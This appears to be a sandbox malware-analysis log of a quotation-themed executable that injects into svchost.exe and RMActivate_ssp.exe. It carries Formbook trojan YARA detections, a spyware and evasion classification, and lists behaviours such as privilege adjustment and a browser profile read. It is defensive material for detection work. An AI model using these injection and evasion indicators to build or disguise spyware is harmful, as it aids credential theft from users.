Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03900591 1_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840535 1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EE4F6 1_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E4420 1_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F2446 1_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F6BD7 1_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FAB40 1_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383EA80 1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038429A0 1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390A9A6 1_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03856962 1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038268B8 1_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E8F0 1_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384A840 1_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03842840 1_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BEFA0 1_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03832FC8 1_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03882F28 1_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03860F30 1_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E2F30 1_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B4F40 1_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03852E90 1_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FCE93 1_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FEEDB 1_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FEE26 1_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840E59 1_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03858DBF 1_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383ADE0 1_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384AD00 1_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DCD1F 1_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0CB5 1_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03830CF2 1_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03840C00 1_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0388739A 1_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F132D 1_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382D34C 1_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038452A0 1_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385B2C0 1_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E12ED 1_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385D2F0 1_2_0385D2F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384B1B0 1_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387516C 1_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382F172 1_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390B16B 1_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EF0CC 1_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038470C0 1_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F70E9 1_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FF0E0 1_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FF7B0 1_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F16CC 1_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03885630 1_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DD5B0 1_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039095C3 1_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F7571 1_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FF43F 1_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03831460 1_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385FB80 1_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B5BF0 1_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0387DBF9 1_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FFB76 1_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DDAAC 1_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03885AA0 1_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E1AA3 1_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EDAC6 1_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FFA49 1_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F7A46 1_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B3A6C 1_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D5910 1_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03849950 1_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385B950 1_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038438E0 1_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AD800 1_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03841F92 1_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FFFB1 1_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03803FD2 1_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03803FD5 1_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FFF09 1_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03849EB0 1_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385FDC0 1_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03843D40 1_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F1D5A 1_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F7D73 1_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FFCF2 1_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B9C32 1_2_038B9C32
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343A352 3_2_0343A352
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034403E6 3_2_034403E6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0338E3F0 3_2_0338E3F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03420274 3_2_03420274
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034002C0 3_2_034002C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03408158 3_2_03408158
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03370100 3_2_03370100
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0341A118 3_2_0341A118
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034381CC 3_2_034381CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034341A2 3_2_034341A2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034401AA 3_2_034401AA
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03412000 3_2_03412000
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03380770 3_2_03380770
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033A4750 3_2_033A4750
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0337C7C0 3_2_0337C7C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0339C6E0 3_2_0339C6E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03380535 3_2_03380535
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03440591 3_2_03440591
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03432446 3_2_03432446
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03424420 3_2_03424420
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0342E4F6 3_2_0342E4F6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343AB40 3_2_0343AB40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03436BD7 3_2_03436BD7
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0337EA80 3_2_0337EA80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03396962 3_2_03396962
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033829A0 3_2_033829A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0344A9A6 3_2_0344A9A6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03382840 3_2_03382840
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0338A840 3_2_0338A840
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033668B8 3_2_033668B8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033AE8F0 3_2_033AE8F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033A0F30 3_2_033A0F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033C2F28 3_2_033C2F28
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03422F30 3_2_03422F30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033F4F40 3_2_033F4F40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033FEFA0 3_2_033FEFA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03372FC8 3_2_03372FC8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03380E59 3_2_03380E59
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343EE26 3_2_0343EE26
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343EEDB 3_2_0343EEDB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03392E90 3_2_03392E90
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343CE93 3_2_0343CE93
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0338AD00 3_2_0338AD00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0341CD1F 3_2_0341CD1F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03398DBF 3_2_03398DBF
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0337ADE0 3_2_0337ADE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03380C00 3_2_03380C00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03370CF2 3_2_03370CF2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03420CB5 3_2_03420CB5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343132D 3_2_0343132D
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0336D34C 3_2_0336D34C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033C739A 3_2_033C739A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033852A0 3_2_033852A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034212ED 3_2_034212ED
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0339D2F0 3_2_0339D2F0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0339B2C0 3_2_0339B2C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0344B16B 3_2_0344B16B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0336F172 3_2_0336F172
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033B516C 3_2_033B516C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0338B1B0 3_2_0338B1B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0342F0CC 3_2_0342F0CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343F0E0 3_2_0343F0E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034370E9 3_2_034370E9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033870C0 3_2_033870C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343F7B0 3_2_0343F7B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033C5630 3_2_033C5630
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034316CC 3_2_034316CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03437571 3_2_03437571
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_034495C3 3_2_034495C3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0341D5B0 3_2_0341D5B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03371460 3_2_03371460
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343F43F 3_2_0343F43F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343FB76 3_2_0343FB76
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0339FB80 3_2_0339FB80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033BDBF9 3_2_033BDBF9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033F5BF0 3_2_033F5BF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03437A46 3_2_03437A46
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343FA49 3_2_0343FA49
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033F3A6C 3_2_033F3A6C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0342DAC6 3_2_0342DAC6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033C5AA0 3_2_033C5AA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03421AA3 3_2_03421AA3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0341DAAC 3_2_0341DAAC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03415910 3_2_03415910
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03389950 3_2_03389950
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0339B950 3_2_0339B950
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033ED800 3_2_033ED800
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033838E0 3_2_033838E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343FF09 3_2_0343FF09
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03381F92 3_2_03381F92
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03343FD5 3_2_03343FD5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03343FD2 3_2_03343FD2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343FFB1 3_2_0343FFB1
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03389EB0 3_2_03389EB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03431D5A 3_2_03431D5A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03437D73 3_2_03437D73
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03383D40 3_2_03383D40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0339FDC0 3_2_0339FDC0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_033F9C32 3_2_033F9C32
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_0343FCF2 3_2_0343FCF2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029B1760 3_2_029B1760
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029CA0A0 3_2_029CA0A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029ACB80 3_2_029ACB80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029AC959 3_2_029AC959
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029AC960 3_2_029AC960
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029AAECB 3_2_029AAECB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029AAC00 3_2_029AAC00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029AADD8 3_2_029AADD8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029B3270 3_2_029B3270
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029B326B 3_2_029B326B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029B1C70 3_2_029B1C70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_031BA2F2 3_2_031BA2F2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_031BB028 3_2_031BB028
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_031BBB04 3_2_031BBB04
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_031BBFC5 3_2_031BBFC5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_031BBC23 3_2_031BBC23
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03887E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0382B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 033FF290 appears 103 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 033B5130 appears 58 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 033C7E54 appears 107 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 0336B970 appears 262 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 033EEA12 appears 86 times
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: String function: 00938B40 appears 42 times
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: String function: 00917F41 appears 35 times
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: String function: 00930D27 appears 70 times
Source: PTT Group project - Quotation.exe, 00000000.00000003.1648245387.00000000037F3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PTT Group project - Quotation.exe
Source: PTT Group project - Quotation.exe, 00000000.00000003.1648355217.000000000399D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PTT Group project - Quotation.exe
Source: PTT Group project - Quotation.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@13/7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097A2D5 GetLastError,FormatMessageW, 0_2_0097A2D5
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00968713 AdjustTokenPrivileges,CloseHandle, 0_2_00968713
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00968CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00968CC3
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0097B59E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0098F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0098F121
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_009886D0
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00914FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00914FE9
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe File created: C:\Users\user\AppData\Local\Temp\autC8E0.tmp Jump to behavior
Source: PTT Group project - Quotation.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
